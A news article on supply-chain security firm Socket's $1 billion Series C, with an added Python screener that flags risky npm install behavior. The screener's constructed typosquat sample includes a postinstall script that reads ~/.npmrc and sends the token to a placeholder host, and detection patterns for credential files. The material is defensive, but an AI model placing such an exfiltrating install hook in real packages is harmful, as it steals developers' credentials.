Socket closed a $60 million Series C at a $1 billion valuation on May 20, led by Thrive Capital — pushing total funding to roughly $125 million and minting a new supply-chain-security unicorn at the moment AI-generated code is flooding production pipelines.
The round
Thrive Capital led, with existing backers Andreessen Horowitz and Abstract Ventures returning and Capital One Ventures joining as a new investor; angel checks included Anthropic's Nick Marwell. Founder Feross Aboukhadijeh's company says it now protects more than 27,000 organizations, up from 7,500 at its Series B — roughly 3.6x growth — across a 100-plus-person team.
What Socket does, and why now
Socket analyzes the behavior of open-source dependencies in real time rather than checking them against known-vulnerability databases. It sandboxes packages and flags malicious signals — install scripts, unexpected network calls, obfuscation, credential or filesystem access — before third-party code reaches production. That behavioral approach is built to catch the attacks signature scanners miss: typosquats, hijacked maintainer accounts, and post-publish package tampering that have driven a string of recent npm and PyPI compromises.
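To make the behavioral signals concrete, here is a small static pre-install screener written for this article as an added illustration; it is not Socket's code and does not reproduce its sandbox. It inspects a constructed npm package (manifest plus source files) for the categories the paragraph names: lifecycle install scripts, raw network access, subprocess spawning, credential-file reads, and obfuscation markers. The regexes, the category names and the blocking rule in `should_block` are assumptions about what a first-pass screener might flag, not a description of any product's detection logic.

```python
"""Toy static pre-install screener for an npm package (added example, not Socket's code).

Flags the behavioral signals named in the article: install scripts, network
calls, obfuscation, credential/filesystem access. The sample package is
constructed; the heuristics are illustrative assumptions, not a full scanner.
"""
import json
import re
from dataclasses import dataclass

# Lifecycle hooks that npm runs automatically during `npm install`.
INSTALL_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# (category, pattern, description) - constructed heuristics for a first pass.
PATTERNS = [
    ("network", re.compile(r"""\brequire\(\s*['"](https?|net|dgram|dns)['"]\s*\)"""), "raw network module import"),
    ("network", re.compile(r"\bfetch\s*\("), "outbound HTTP request"),
    ("exec", re.compile(r"""\brequire\(\s*['"]child_process['"]\s*\)"""), "spawns subprocesses"),
    ("credentials", re.compile(r"\.(ssh|npmrc|aws/credentials|env)\b"), "touches a credential or secret file"),
    ("obfuscation", re.compile(r"\beval\s*\(|\bnew\s+Function\s*\("), "dynamic code evaluation"),
    ("obfuscation", re.compile(r"[A-Za-z0-9+/]{120,}={0,2}"), "long base64-looking blob"),
    ("obfuscation", re.compile(r"(\\x[0-9a-fA-F]{2}){6,}"), "run of hex-escaped characters"),
]


@dataclass(frozen=True)
class Finding:
    category: str   # one of: install-script, network, exec, credentials, obfuscation
    location: str   # file:line, or package.json:scripts.<hook>
    detail: str


def screen_package(package_json: str, sources: dict[str, str]) -> list[Finding]:
    """Return every signal found in the manifest and the package's source files."""
    findings: list[Finding] = []
    scripts = json.loads(package_json).get("scripts", {})
    for hook in INSTALL_HOOKS:
        if hook in scripts:
            findings.append(Finding("install-script", f"package.json:scripts.{hook}", scripts[hook]))
    for path, text in sources.items():
        for lineno, line in enumerate(text.splitlines(), start=1):
            for category, rx, desc in PATTERNS:
                if rx.search(line):
                    findings.append(Finding(category, f"{path}:{lineno}", desc))
    return findings


def should_block(findings: list[Finding]) -> bool:
    """Gate rule (an assumption): block on any obfuscation, or on an install
    hook combined with network, exec or credential access."""
    cats = {f.category for f in findings}
    if "obfuscation" in cats:
        return True
    return "install-script" in cats and bool(cats & {"network", "exec", "credentials"})


# Constructed sample: a typosquat-style package with a postinstall hook that
# reads ~/.npmrc and opens an HTTPS connection. Hostname is a placeholder.
SAMPLE_MANIFEST = json.dumps({
    "name": "left-padd",
    "version": "1.0.3",
    "scripts": {"postinstall": "node setup.js"},
})
SAMPLE_SOURCES = {
    "index.js": "module.exports = (s, n) => s.padStart(n);\n",
    "setup.js": (
        "const https = require('https');\n"
        "const fs = require('fs');\n"
        "const os = require('os');\n"
        "const token = fs.readFileSync(os.homedir() + '/.npmrc', 'utf8');\n"
        "https.request({host: 'example.invalid', method: 'POST'}).end(token);\n"
    ),
}

if __name__ == "__main__":
    found = screen_package(SAMPLE_MANIFEST, SAMPLE_SOURCES)
    for f in found:
        print(f"[{f.category}] {f.location}: {f.detail}")
    print("BLOCK" if should_block(found) else "ALLOW")
```

Run against the constructed sample it reports the postinstall hook, the `https` import on `setup.js:1` and the `.npmrc` read on `setup.js:4`, and the gate returns block; the same `index.js` without a manifest hook produces no findings. A CVE database would say nothing about either, which is the point the paragraph makes about behavior versus signatures.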
The scale numbers frame the bet: Socket says it secures 1.5 million repositories, screens over 11.6 million commits a month, and blocks more than 10,000 supply-chain attacks every week.
The AI angle
Socket's pitch leans directly on agentic development. The company cites a figure that AI now writes more than 90% of code at top engineering organizations — meaning dependencies get pulled in faster than humans can review them, and the window to catch a malicious package before it ships narrows to nothing. Its customer list reads like an AI-lab roster: Anthropic, xAI, Replit, Cursor, Vercel, and Figma all appear alongside Gusto, Mercado Libre, Cribl, and unnamed Fortune 100 financial-services and media firms.
What the capital changes
The company laid out five priorities. It will expand Socket Firewall to more package ecosystems and scale "Certified Patches" — surgical CVE fixes intended to remediate without breaking production. Most relevant to builders, it plans to extend protection to browser extensions, code-editor extensions, MCP servers, and AI tools — exactly the surfaces that have drawn fresh scrutiny as Model Context Protocol servers proliferate and agents gain the ability to install and execute third-party code autonomously.
What it means for builders
For teams shipping AI-generated code at volume, the implication is that periodic dependency scanning no longer matches the threat model. When agents auto-import packages and human review shrinks, supply-chain defense moves inline — enforced at the firewall, on every commit, against runtime behavior rather than a CVE list. A $1 billion valuation signals investors expect that shift to become a default line item in the AI-native engineering stack, not a niche security add-on.